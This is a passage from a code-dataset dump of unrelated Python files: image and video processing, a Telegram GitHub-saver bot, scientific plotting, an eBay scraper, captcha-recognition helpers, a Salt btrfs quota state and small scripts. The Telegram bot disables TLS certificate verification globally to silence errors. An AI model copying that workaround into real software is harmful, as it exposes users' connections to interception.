Pipeline.find_objects(labelMap):\n boundingBox = ObjectBoundingBox(labeledArea)\n cv2.rectangle(image,\n pt1=(boundingBox.left, boundingBox.top),\n pt2=(boundingBox.right, boundingBox.bottom),\n color=(255, 0, 0),\n thickness=3)\n\n return image\n\n def find_objects(labelMap):\n objects = find_objects(labelMap)\n objects = Pipeline.filter_tall_objects(objects)\n return objects\n\n def filter_tall_objects(objects):\n for obj in objects:\n boundingBox = ObjectBoundingBox(obj)\n width = boundingBox.right - boundingBox.left\n height = boundingBox.bottom - boundingBox.top\n if width / height > 0.5:\n yield obj\n\nclass ObjectBoundingBox:\n\n def __init__(self, obj):\n self.top = obj[0].start\n self.bottom = obj[0].stop\n self.left = obj[1].start\n self.right = obj[1].stop\n\nif __name__ == \"__main__\":\n\n pipeline = Pipeline()\n\n inputFileName = \"project_video.mp4\"\n outputFileName = \"output.avi\"\n\n inputVideo = utils.VideoClip(inputFileName)\n\n fourcc = cv2.VideoWriter_fourcc(*\"XVID\")\n outputVideo = cv2.VideoWriter(outputFileName, fourcc, 25, (1280, 720))\n\n for frame in inputVideo.frames():\n image = pipeline.process(frame)\n outputVideo.write(image)\n\n outputVideo.release()\n","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"118000447","text":"import time,sys,telebot,wget,ssl,os\n\n#Fix for CERTIFICATE_VERIFY_FAILED\nssl._create_default_https_context = ssl._create_unverified_context\n\nbot = telebot.TeleBot('token')\nuser_id = 123456789\n\n\ndef create_dir(path):\n\ttry:\n\t\tos.mkdir(path)\n\texcept OSError:\n\t\tpass\n\ndef remove_file(path):\n\ttry:\n\t\tos.remove(path)\n\texcept OSError:\n\t\tpass\n\ndef github_download(message):\n\tgithub_url=message.text.split('/')\n\tfor gh in enumerate(github_url):\n\t\tif(gh[1]=='github.com'):\n\t\t\tcreate_dir('github')\n\t\t\tgithub_download_url=f\"https://github.com/{github_url[gh[0]+1]}/{github_url[gh[0]+2]}/archive/master.zip\"\n\t\t\tfile_name=f\"github/{github_url[gh[0]+1]}_{github_url[gh[0]+2]}.zip\"\n\t\t\tif(os.path.isfile(file_name)):\n\t\t\t\tremove_file(file_name)\n\t\t\twget.download(github_download_url, file_name)\n\t\t\tbot.delete_message(message.chat.id,message.message_id)\n\t\t\tbreak\n\n\n@bot.message_handler(func=lambda message: True)\ndef echo_all(message):\n\ttry:\n\t\tif(message.from_user.id==user_id):\n\t\t\tif(message.text.find('github.com')>-1):\n\t\t\t\tgithub_download(message)\n\texcept Exception as e:\n\t\tprint(e)\n\t\nwhile True:\n\ttry:\n\t\t#bot.polling(none_stop=True)\n\t\tprint('\\t✅ Working')\n\t\tbot.polling()\n\t\tsys.exit()\n\texcept Exception as e:\n\t\tprint(e)\n\t\tprint('\\t🔄 Restart')","sub_path":"tg_github_saver.py","file_name":"tg_github_saver.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"443350298","text":"from os import walk, path\nimport unittest\nimport rasterio\nimport pytest\n\nfrom geopyspark.geotrellis.constants import SPATIAL\nfrom geopyspark.tests.python_test_utils import geotiff_test_path\nfrom geopyspark.geotrellis.geotiff_rdd import get\nfrom geopyspark.tests.base_test_class import BaseTestClass\n\n\nclass S3GeoTiffIOTest(object):\n def get_filepaths(self, dir_path):\n files = []\n\n for (fd, dn, filenames) in walk(dir_path):\n files.extend(filenames)\n\n return [path.join(dir_path, x) for x in files]\n\n def read_geotiff_rasterio(self, paths, windowed):\n rasterio_tiles = []\n\n windows = [((0, 256), (0, 256)),\n ((256, 512), (0, 256)),\n ((0, 256), (256, 512)),\n ((256, 512), (256, 512))]\n\n for f in paths:\n with rasterio.open(f) as src:\n if not windowed:\n rasterio_tiles.append({'data': src.read(),\n 'no_data_value': src.nodata})\n else:\n for window in windows:\n rasterio_tiles.append(\n {'data': src.read(window=window),\n 'no_data_value': src.nodata})\n\n return rasterio_tiles\n\n\nclass Multiband(S3GeoTiffIOTest, BaseTestClass):\n mock_wrapper = BaseTestClass.geopysc._jvm.geopyspark.geotrellis.testkit.MockS3ClientWrapper\n client = mock_wrapper.mockClient()\n\n key = \"one-month-tiles-multiband/result.tif\"\n bucket = \"test\"\n\n uri = \"s3://test/one-month-tiles-multiband/result.tif\"\n file_path = geotiff_test_path(key)\n options = {\"s3Client\": \"mock\"}\n\n in_file = open(file_path, \"rb\")\n data = in_file.read()\n in_file.close()\n\n @pytest.fixture(scope='class', autouse=True)\n def tearDown(self):\n yield\n BaseTestClass.geopysc.pysc._gateway.close()\n\n def read_multiband_geotrellis(self, opt=options):\n self.client.putObject(self.bucket, self.key, self.data)\n result = get(BaseTestClass.geopysc,\n SPATIAL,\n self.uri,\n opt)\n\n return [tile[1] for tile in result.to_numpy_rdd().collect()]\n\n def test_whole_tiles(self):\n geotrellis_tiles = self.read_multiband_geotrellis()\n rasterio_tiles = self.read_geotiff_rasterio([self.file_path], False)\n\n for x, y in zip(geotrellis_tiles, rasterio_tiles):\n self.assertTrue((x['data'] == y['data']).all())\n\n def windowed_result_checker(self, windowed_tiles):\n self.assertEqual(len(windowed_tiles), 4)\n\n def test_windowed_tiles(self):\n geotrellis_tiles = self.read_multiband_geotrellis({\"s3Client\": \"mock\", \"maxTileSize\": 256})\n rasterio_tiles = self.read_geotiff_rasterio([self.file_path], True)\n\n self.windowed_result_checker(geotrellis_tiles)\n\n for x, y in zip(geotrellis_tiles, rasterio_tiles):\n self.assertTrue((x['data'] == y['data']).all())\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"geopyspark/tests/s3_geotiff_rdd_test.py","file_name":"s3_geotiff_rdd_test.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"77555927","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport numpy\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport pylab\nimport h5py\n\n\n\ndef trim_axs(axs, N):\n \"\"\"little helper to massage the axs list to have correct length...\"\"\"\n axs = axs.flat\n for ax in axs[N:]:\n ax.remove()\n return axs[:N]\n\n\ndef gen_image(dset, basename, cbar=True, log=False):\n figsize = (numpy.array(dset.shape) / 100.0)[::-1]\n fig = plt.figure()\n fig.set_size_inches(figsize)\n if cbar:\n figsize[1] *= 1.1\n plt.title(basename)\n ax = plt.gca()\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n else:\n plt.axes([0, 0, 1, 1]) # Make the plot occupy the whole canvas\n plt.axis('off')\n if log:\n image_filename = basename + '_log.png'\n im = plt.imshow(dset,norm=LogNorm())\n else:\n image_filename = basename + '.png'\n im = plt.imshow(dset)\n\n if cbar:\n plt.colorbar(im, cax=cax)\n \n plt.savefig(image_filename, dpi=100)\n\n\ndef plot_pixelSum(xpcs_h5file):\n pixelSum_dset = xpcs_h5file['exchange/pixelSum']\n basename = 'scattering_pattern'\n gen_image(pixelSum_dset, basename, log=True)\n gen_image(pixelSum_dset, basename + '_lin', cbar=False)\n # Old scattering images Suresh doesn't want anymore. Uncomment to begin generating again\n # gen_image(pixelSum_dset, basename)\n # gen_image(pixelSum_dset, basename + '_pre', cbar=False, log=True)\n\n\ndef plot_intensity_vs_time(xpcs_h5file):\n i_vs_t = xpcs_h5file['exchange/frameSum']\n pylab.plot(i_vs_t[0], i_vs_t[1])\n plt.xlabel(\"Elapsed Time (s)\")\n plt.ylabel(\"Average Intensity (photons/pixel/frame)\")\n plt.title(xpcs_h5file.filename.rstrip('.hdf'))\n plt.savefig('total_intensity_vs_time.png')\n\n\ndef plot_intensity_t_vs_q(xpcs_h5file):\n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n q = xpcs_h5file['/xpcs/sqlist']\n pmt_t = xpcs_h5file['/exchange/partition-mean-partial']\n markers = ['o', 'x', '+', 'v', '^', '<', '>', 's', 'p', '*', 'h',\n 'D']\n n_markers = len(markers)\n n_plots = pmt_t.shape[0]\n fig = plt.figure()\n fig.set_size_inches((8,6.25))\n ax = plt.gca()\n for i in range(0, n_plots):\n if i >= n_markers:\n markerfacecolor = 'gray'\n i_marker = i - n_markers\n else:\n markerfacecolor = 'None'\n i_marker = i\n ax.plot(q[0], pmt_t[i], color='k', marker=markers[i_marker],\n alpha=0.5,\n markerfacecolor=markerfacecolor,\n markeredgecolor='k',\n markersize=4,\n markeredgewidth=0.3,\n linestyle = 'None',\n label='{:d}'.format(i+1))\n ax.set_yscale('log')\n ax.set_xscale('log')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Intensity (photons/pixel/frame)\")\n ax.legend(numpoints=1)\n plt.title('{} Intensity Mean Partial'.format(basename))\n plt.tight_layout()\n plt.savefig('{}_intensity_t.png'.format(basename), dpi=150)\n\ndef plot_intensity_vs_q(xpcs_h5file):\n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n q = xpcs_h5file['/xpcs/sqlist']\n pmt = xpcs_h5file['/exchange/partition-mean-total']\n fig = plt.figure()\n fig.set_size_inches((8,6.25))\n plt.loglog(q[0], pmt[0], color='k')\n plt.xlabel(\"q (A^-1)\")\n plt.ylabel(\"Intensity (photons/pixel/frame)\")\n plt.title('{} Intensity Mean Total'.format(basename))\n plt.tight_layout()\n plt.savefig(basename + '_intensity.png', dpi=150)\n\n\ndef plot_g2_all(xpcs_h5file):\n def sfig(bn, gs, ge):\n fig.suptitle('{} Correlations g2 {:d} to {:d}'.format(bn, gs, ge))\n plt.savefig('{}_g2_corr_{:03d}_{:03d}.png'.format(bn, gs, ge), dpi=100)\n \n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n exp = xpcs_h5file['/measurement/instrument/detector/exposure_period']\n dt = xpcs_h5file['/exchange/tau'][0]*exp[0][0]\n g2_all = xpcs_h5file['/exchange/norm-0-g2']\n g2_err_all = xpcs_h5file['/exchange/norm-0-stderr']\n dynamicQ = xpcs_h5file['/xpcs/dqlist'][0]\n n_plots = dynamicQ.shape[0]\n\n g_index = 0\n while g_index < n_plots:\n g_start = g_index\n pylab.clf()\n fig, axs = plt.subplots(nrows=3, ncols=3, constrained_layout=True)\n fig.set_size_inches((10,10.25))\n for i in range(0, 3): # x, left-right axis\n for j in range(0, 3): # y, top-down axis\n ax = axs[i,j]\n ax.errorbar(dt, g2_all[:, g_index], yerr=g2_err_all[:, g_index],\n fmt='ko', fillstyle='none', capsize=2, markersize=5)\n ax.set_title('q={:f}'.format(dynamicQ[g_index]))\n ax.set_yscale('linear')\n ax.set_xscale('log')\n g_index += 1\n if g_index == n_plots:\n sfig(basename, g_start, g_index - 1)\n break\n sfig(basename, g_start, g_index - 1)\n\ndef plot_g2_all_fit(xpcs_h5file):\n def sfig(bn, gs, ge):\n fig.suptitle('{} Correlation Fitting Result'.format(bn))\n plt.savefig('{}_g2_corr_fit{:03d}_{:03d}.png'.format(bn, gs, ge), dpi=100)\n \n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n exp = xpcs_h5file['/measurement/instrument/detector/exposure_period']\n dt = xpcs_h5file['/exchange/tau'][0]*exp[0][0]\n g2_all = xpcs_h5file['/exchange/norm-0-g2']\n g2_err_all = xpcs_h5file['/exchange/norm-0-stderr']\n g2_fit1_all = xpcs_h5file['/exchange/g2avgFIT1'][:,0,:]\n g2_fit2_all = xpcs_h5file['/exchange/g2avgFIT2'][:,0,:]\n dynamicQ = xpcs_h5file['/xpcs/dqlist'][0]\n n_plots = dynamicQ.shape[0]\n\n g_index = 0\n while g_index < n_plots:\n g_start = g_index\n pylab.clf()\n fig, axs = plt.subplots(nrows=3, ncols=3, constrained_layout=True)\n fig.set_size_inches((10,10.25))\n for i in range(0, 3): # x, left-right axis\n for j in range(0, 3): # y, top-down axis\n ax = axs[i,j]\n ax.plot(dt, g2_fit1_all[:, g_index], 'b')\n ax.plot(dt, g2_fit2_all[:, g_index], 'r')\n ax.errorbar(dt, g2_all[:, g_index], yerr=g2_err_all[:, g_index],\n fmt='ko', fillstyle='none', capsize=2, markersize=5)\n ax.set_title('q={:f}'.format(dynamicQ[g_index]))\n ax.set_yscale('linear')\n ax.set_xscale('log')\n g_index += 1\n if g_index == n_plots:\n sfig(basename, g_start, g_index - 1)\n break\n sfig(basename, g_start, g_index - 1)\n\ndef plot_fits(xpcs_h5file):\n \n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n\n x = xpcs_h5file['/xpcs/dqlist'][0]\n\n c1 = xpcs_h5file['exchange/contrastFIT1'][0]\n c2 = xpcs_h5file['exchange/contrastFIT2'][0]\n c1_err = xpcs_h5file['exchange/contrastErrFIT1'][0]\n c2_err = xpcs_h5file['exchange/contrastErrFIT2'][0]\n \n b1 = xpcs_h5file['exchange/baselineFIT1'][0]\n b2 = xpcs_h5file['exchange/baselineFIT2'][0]\n b1_err = xpcs_h5file['exchange/baselineErrFIT1'][0]\n b2_err = xpcs_h5file['exchange/baselineErrFIT2'][0]\n\n tau1 = xpcs_h5file['exchange/tauFIT1'][0]\n tau2 = xpcs_h5file['exchange/tauFIT2'][0]\n tau1_err = xpcs_h5file['exchange/tauErrFIT1'][0]\n tau2_err = xpcs_h5file['exchange/tauErrFIT2'][0]\n\n exp2 = xpcs_h5file['exchange/exponentFIT2'][0]\n exp2_err = xpcs_h5file['exchange/exponentErrFIT2'][0]\n\n fig, axs = plt.subplots(nrows=2, ncols=2, constrained_layout=True)\n fig.set_size_inches((10,10.25))\n \n ax = axs[0,0]\n ax.errorbar(x, c1, yerr=c1_err,\n fmt='bo', fillstyle='none',\n capsize=2, markersize=5, label='Simple Exp')\n ax.errorbar(x, c2, yerr=c2_err,\n fmt='ro', fillstyle='none',\n capsize=2, markersize=5, label='Stretched Exp')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Contrast\")\n ax.set_yscale('linear')\n ax.set_xscale('log') \n ax.set_ylim([-0.5, 1])\n ax.legend(numpoints=1)\n \n ax = axs[0,1]\n ax.errorbar(x, b1, yerr=b1_err,\n fmt='bo', fillstyle='none',\n capsize=2, markersize=5, label='Simple Exp')\n ax.errorbar(x, b2, yerr=b2_err,\n fmt='ro', fillstyle='none',\n capsize=2, markersize=5, label='Stretched Exp')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Baseline\")\n ax.set_yscale('linear')\n ax.set_xscale('log') \n ax.legend(numpoints=1)\n\n ax = axs[1,1]\n ax.errorbar(x, tau1, yerr=tau1_err,\n fmt='bo', fillstyle='none',\n capsize=2, markersize=5, label='Simple Exp')\n ax.errorbar(x, tau2, yerr=tau2_err,\n fmt='ro', fillstyle='none',\n capsize=2, markersize=5, label='Stretched Exp')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Tau (sec)\")\n ax.set_yscale('log')\n ax.set_xscale('log') \n ax.legend(numpoints=1)\n\n ax = axs[1,0]\n ax.errorbar(x, exp2, yerr=exp2_err,\n fmt='ro', fillstyle='none',\n capsize=2, markersize=5, label='Stretched Exp')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Stretching Exponent\")\n ax.set_yscale('linear')\n ax.set_xscale('log') \n ax.set_ylim([0, 2.25])\n ax.legend(numpoints=1)\n \n fig.suptitle('{} Correlation Fitting Parameters'.format(basename))\n plt.savefig('{}_corr_params.png'.format(basename), dpi=100)\n\n\ndef make_plots(h5filename):\n print('opening ' + h5filename)\n x_h5_file = h5py.File(h5filename, 'r')\n error_log = 'plot_errors.log'\n for xplot in (plot_intensity_vs_time, plot_intensity_vs_q, plot_intensity_t_vs_q,\n plot_g2_all, plot_g2_all_fit, plot_pixelSum, plot_fits):\n try:\n xplot(x_h5_file)\n plt.close('all') #why does it need this?\n except Exception as e:\n with open(error_log, 'w+') as f:\n f.write(f'Error Plotting {xplot.__name__}: {str(e)}')\n\nif __name__ == '__main__':\n make_plots(sys.argv[1])","sub_path":"gladier_xpcs/tools/xpcs_plots.py","file_name":"xpcs_plots.py","file_ext":"py","file_size_in_byte":10315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"151745591","text":"# scrapes completed listings for Ford Mustangs\n\nimport scrapy\n\n\nclass EbaySpider(scrapy.Spider):\n name = 'ebay_motors4'\n\n custom_settings = {\n \"DOWNLOAD_DELAY\": 1,\n \"CONCURRENT_REQUESTS_PER_DOMAIN\": 8,\n \"HTTPCACHE_ENABLED\": True\n }\n\n# completed sales, no zip code specified\n start_urls = [\n 'https://www.ebay.com/sch/Cars-Trucks/6001/i.html?makeval=Ford&modelval=Mustang&_nkw=Ford%20Mustang&LH_Complete=1&LH_Sold=1&rt=nc&_trksid=p2045573.m1684'\n ]\n\n\n def parse(self, response):\n # Extract links to each car listing\n for href in response.xpath(\n '//h3[@class=\"lvtitle\"]/a/@href'\n ).extract():\n # For each car link, call 'parse_car' (defined later)\n yield scrapy.Request(\n url=href,\n callback=self.parse_car,\n meta={'url': href}\n )\n # Follow pagination links and repeat\n next_url = response.xpath(\n '//td[@class=\"pagn-next\"]/a/@href'\n ).extract()[0]\n\n yield scrapy.Request(\n url=next_url,\n callback=self.parse\n )\n\n def parse_car(self, response):\n\n title = response.xpath('//h1/text()').extract()\n\n subtitle = [subtl.strip() for subtl in response.xpath('//h2[@class=\"it-sttl\"]/text()').extract()]\n\n winningbid = response.xpath('//div[@class=\"u-flL w29 vi-price-np\"]/span[@id]/text()').extract()\n buy_it_now_price = [bin.strip() for bin in response.xpath('//div[@class=\"u-flL w29 vi-price\"]/span[@id]/text()').extract()]\n\n num_bids = response.xpath('//a[@class=\"vi-bidC\"]/span/text()').extract_first()\n\n url = response.request.meta['url']\n\n catsvals = [catval.strip() for catval in response.xpath('//div[@class=\"section\"]//tr//text()').extract()]\n\n yield {\n 'title': title,\n 'subtitle' : subtitle,\n 'winningbid' : winningbid,\n 'buy_it_now_price':buy_it_now_price,\n 'num_bids' : num_bids,\n 'url': url,\n 'catsvals': catsvals\n }\n\n \n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"web_scraping/mustang_spider.py","file_name":"mustang_spider.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"564348552","text":"import random\nimport os\n\nfrom captcha.image import ImageCaptcha\nimport numpy as np\nfrom PIL import Image\n\nCHARACTERS = \"\".join([chr(i) for i in range(48, 58)] + [chr(i) for i in range(97, 123)] + [chr(i) for i in range(65, 91)])\n\n\ndef captcha_image_generator(\n batch_size=64,\n height=70,\n width=160,\n n_class=62,\n characters=CHARACTERS,\n char_num=4,\n font_sizes=(46)\n ):\n X = np.zeros((batch_size, height, width, 3), dtype=np.uint8)\n y = [np.zeros((batch_size, n_class), dtype=np.uint8) for i in range(char_num)]\n generator = ImageCaptcha(width=width, height=height, font_sizes=font_sizes)\n while True:\n for i in range(batch_size):\n random_str = ''.join([random.choice(characters) for j in range(4)])\n image = generator.generate_image(random_str)\n X[i] = image\n for j, ch in enumerate(random_str):\n y[j][i, :] = 0\n y[j][i, characters.find(ch)] = 1\n yield X, y\n\n\ndef vetors_to_labels(y, chars=CHARACTERS):\n '''\n convert the one hot vetor to string labels\n :param y: one hot vetor with shape(char num, size of example, n_class)\n :param chars:\n :return:\n '''\n index = np.argmax(np.array(y), axis=2)\n char_num, m = index.shape\n return [''.join(chars[index[i][k]] for i in range(char_num)) for k in range(m)]\n\n\ndef evaluate_by_generator(generator, model, steps=10):\n '''\n evaluate the model by generator\n :param generator:\n :param model:\n :param steps:\n :return: accurary\n '''\n success = 0\n total = 0\n for i in range(steps):\n X, y = next(generator)\n predicts = vetors_to_labels(model.predict(X))\n labels = vetors_to_labels(y)\n m = X.shape[0]\n for j in range(m):\n if predicts[j].lower() == labels[j].lower():\n success += 1\n total += 1\n\n return success * 1.0 / total\n\ndef evaluate_by_files(folder, model, height, width, chars=CHARACTERS):\n success = 0\n labels = []\n X = []\n for file in os.listdir(folder):\n file_path = os.path.join(folder, file)\n image = Image.open(file_path).convert(\"RGB\").resize((width, height))\n x = np.array(image, dtype=np.uint8)\n labels.append(file[:4])\n X.append(x)\n total = len(labels)\n X = np.array(X, dtype=np.uint8)\n predicts = model.predict(X)\n predict_labels = vetors_to_labels(predicts, chars)\n for i in range(total):\n if labels[i].lower() == predict_labels[i].lower():\n success += 1\n return success * 1.0 / total\n\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"347182191","text":"# -*- coding: utf-8 -*-\r\n'''\r\nState to add or remove quota\r\n\r\n'''\r\n# Import python libs\r\nfrom __future__ import absolute_import\r\nimport logging\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\ndef present(name, size):\r\n ret = { \r\n 'name': name,\r\n 'size': size,\r\n 'oldsize': '', \r\n 'changes': {}, \r\n 'result': True, \r\n 'comment': 'The quota {0} is present in {1}'.format(size, name) \r\n }\r\n \r\n\r\n if __salt__['btrfs.check_quota'](name):\r\n #Get actual size\r\n ret['oldsize'] = __salt__['btrfs.get_size'](name).rstrip('iB').replace('.00', '')\r\n\r\n if __opts__['test']:\r\n #Check if the size thats set matches the size zou want to set\r\n if size == ret['oldsize']:\r\n #Change a few values in the dictonary\r\n ret['comment'] = 'The quota on {0} is set to {1}'.format(name, size)\r\n \r\n else:\r\n #Change a few values in the dictonary\r\n ret['comment'] = 'The quota on {0} would have changed from {1} to {2}'.format(name, ret['oldsize'], size)\r\n ret['result'] = None\r\n \r\n return ret\r\n\r\n #Check if the size thats set matches the size you want to set\r\n if size == ret['oldsize']:\r\n ret['comment'] = 'The quota on {0} is set to {1}'.format(name, size)\r\n\r\n else:\r\n #Check if the size you want to set is none\r\n if size == 'none':\r\n #Execute the module btrfs.remove_quota\r\n ret['result'] = __salt__['btrfs.remove_quota'](name)\r\n else:\r\n #Execute the module btrfs.set_quota\r\n ret['result'] = __salt__['btrfs.set_quota'](name, size)\r\n \r\n\r\n ret['changes'].update({'diff': {'old': ret['oldsize'],'new': size}}) \r\n ret['comment'] = 'The quota on {0} has changed from {1} to {2}'.format(name, ret['oldsize'], size)\r\n\r\n return ret\r\n else:\r\n ret['comment'] = 'The quota is disabled'\r\n ret['result'] = False\r\n\r\n return ret\r\n\r\n\r\ndef enabled_quota(name):\r\n ret = { \r\n 'name': name,\r\n 'enabled': '', \r\n 'changes': {}, \r\n 'result': True, \r\n 'comment': 'Quota is enabled on {0}'.format(name) \r\n }\r\n\r\n ret['enabled'] = __salt__['btrfs.check_quota'](name)\r\n\r\n if __opts__['test']:\r\n\r\n if not ret['enabled']:\r\n ret['comment'] = 'The qouta would been enabled on {0}'.format(name)\r\n ret['result'] = None\r\n else:\r\n ret['comment'] = 'The qouta is already enabled on {0}'.format(name)\r\n\r\n return ret\r\n \r\n\r\n if not ret['enabled']:\r\n ret['comment'] = 'The qouta is now enabled. You can set qoutas on {0}'.format(name)\r\n ret['result'] = __salt__['btrfs.enable_quota'](name)\r\n else:\r\n ret['comment'] = 'The qouta is already enabled on {0}'.format(name)\r\n\r\n return ret\r\n\r\ndef disabled_quota(name):\r\n ret = { \r\n 'name': name,\r\n 'disabled': '', \r\n 'changes': {}, \r\n 'result': True, \r\n 'comment': 'Quota is disabled on {0}'.format(name) \r\n }\r\n\r\n ret['disabled'] = __salt__['btrfs.check_quota'](name)\r\n\r\n if __opts__['test']:\r\n\r\n if ret['disabled']:\r\n ret['comment'] = 'The qouta would been disabled on {0}'.format(name)\r\n ret['result'] = None\r\n else:\r\n ret['comment'] = 'The qouta is already disabled on {0}'.format(name)\r\n\r\n return ret\r\n \r\n\r\n if ret['disabled']:\r\n ret['comment'] = 'The qouta is now enabled. You can set qoutas on {0}'.format(name)\r\n ret['result'] = __salt__['btrfs.disable_quota'](name)\r\n else:\r\n ret['comment'] = 'The qouta is already enabled on {0}'.format(name)\r\n\r\n return ret","sub_path":"btrfs_quota_state.py","file_name":"btrfs_quota_state.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"487610596","text":"\"\"\"\nImplement int sqrt(int x).\n\nCompute and return the square root of x.\n\nx is guaranteed to be a non-negative integer.\n\nExample 1:\n\nInput: 4\nOutput: 2\nExample 2:\n\nInput: 8\nOutput: 2\nExplanation: The square root of 8 is 2.82842...,\nand since we want to return an integer, the decimal part will be truncated.\n\"\"\"\n\n\nclass Solution(object):\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if x < 2:\n return x\n\n i = 1\n j = x // 2\n while i <= j:\n mid = (i + j) // 2\n sqrt = mid * mid\n\n if sqrt == x:\n return mid\n\n if sqrt < x:\n i = mid + 1\n else:\n j = mid - 1\n\n return j\n\n\n# Newton's method\nclass Solution2(object):\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n res = x\n while res * res > x:\n res = int(1. * res / 2 + 1. * x / (2 * res))\n return res\n\n\nif __name__ == '__main__':\n mySol = Solution()\n x = 8\n print('input: %s' % x)\n print('output: %s' % mySol.mySqrt(x))\n","sub_path":"python/sqrt_x.py","file_name":"sqrt_x.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"571517333","text":"# import necessary modules\nfrom adafruit_circuitplayground import cp\nfrom digitalio import DigitalInOut, Direction, Pull\nimport time\nimport board\nimport neopixel\nimport adafruit_hcsr04\n\n# variables assigned for sonar sensor\nsonar = adafruit_hcsr04.HCSR04(trigger_pin=board.A3, echo_pin=board.A2)\n\n# function to find pattern\ndef find_array_pattern(data, pattern):\n count = 0\n for i in range(len(data)-len(pattern)+1):\n tmp = [data[i], data [i+1]]\n\n try:\n for j in range(len(data)-i):\n #print(i, i+j)\n if tmp[-1] != data[i+j+1]:\n tmp.append(data[i+j+1])\n\n if len(tmp) == len(pattern):\n #print(tmp)\n break\n except:\n pass\n\n if tmp == pattern:\n count +=1\n\n return count\n\n\n# loop this forEVER\nwhile True:\n\n # variable declarations for the pushup loop\n pushup_counter = 0\n moveRecord = []\n\n # actual distance loop\n while True:\n print('looping loop')\n #print(moveRecord)\n\n if find_array_pattern(moveRecord, [1,2,1]) is 1:\n pushup_counter += 1\n moveRecord = []\n\n print('Number of push-ups: ', pushup_counter)\n\n\n # print distance value in cm\n # in push-up posture, the distance from upper body to the ground is approx. 37~40cm\n try:\n sonar_distance = sonar.distance\n # if in runtime error, make neopixel orange\n except RuntimeError:\n print(\"Runtime Error\")\n continue\n\n\n # print('the distance is: ', sonar_distance, 'cm')\n # if distance is bigger than 25cm, make neopixel red\n if sonar_distance >= 25:\n cp.pixels[0] = (255, 0, 0)\n\n passing = True\n print('Going down')\n #time.sleep(1)\n moveRecord.append(1)\n\n # if in the process of push-up, blink with yellow\n elif sonar_distance < 25 and sonar_distance > 10:\n cp.pixels[0] = (255, 150, 0)\n\n print('Not there yet')\n #time.sleep(1)\n\n\n # if distance is less than 10cm, make neopixel teal\n elif sonar_distance <= 10:\n cp.pixels[0] = (0, 255, 50)\n\n print('Go up!')\n moveRecord.append(2)\n\n time.sleep(0.25)\n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"330009669","text":"import numpy as np\nimport argparse\nimport time\nimport cv2\nimport os\n\n\nif __name__ == \"__main__\":\n # Capture video from webcam (the 0th index is the webcam)\n try:\n\n capture = cv2.VideoCapture(0)\n\n except:\n \n print(\"Error - cannot access webcam\")\n \n while True:\n\n # _ makes the interpreter ignore the return\n\n _ , frame = capture.read()\n frame = cv2.rotate(frame, cv2.ROTATE_90_CLOCKWISE)\n\n cv2.imshow('Capture', frame)\n\n key = cv2.waitKey(1)\n if key == 27:\n break\n \n \n \n\n \n\n\n","sub_path":"scripts/camera_test.py","file_name":"camera_test.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"386707977","text":"import os, sys\n\nparent_dir = os.path.abspath(os.path.join(os.getcwd(), \"..\"))\nsys.path.append(parent_dir)\nsys.path.append(os.getcwd())\n\nfrom server import create_app\n\napp = create_app()\n\napp.run(debug=True, threaded=True, host='127.0.0.1', port=5000)\n","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"158916280","text":"# Copyright 2014-2015 Clione Software and Havas Worldwide London\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy\n# of the License at http:#www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\n\nimport falcon\n\nfrom sikre import settings\nfrom sikre.models.users import User\nfrom sikre.models.items import ItemGroup, Item\nfrom sikre.models.services import Service\n\n\nclass DetailService(object):\n\n \"\"\"\n This resource handles 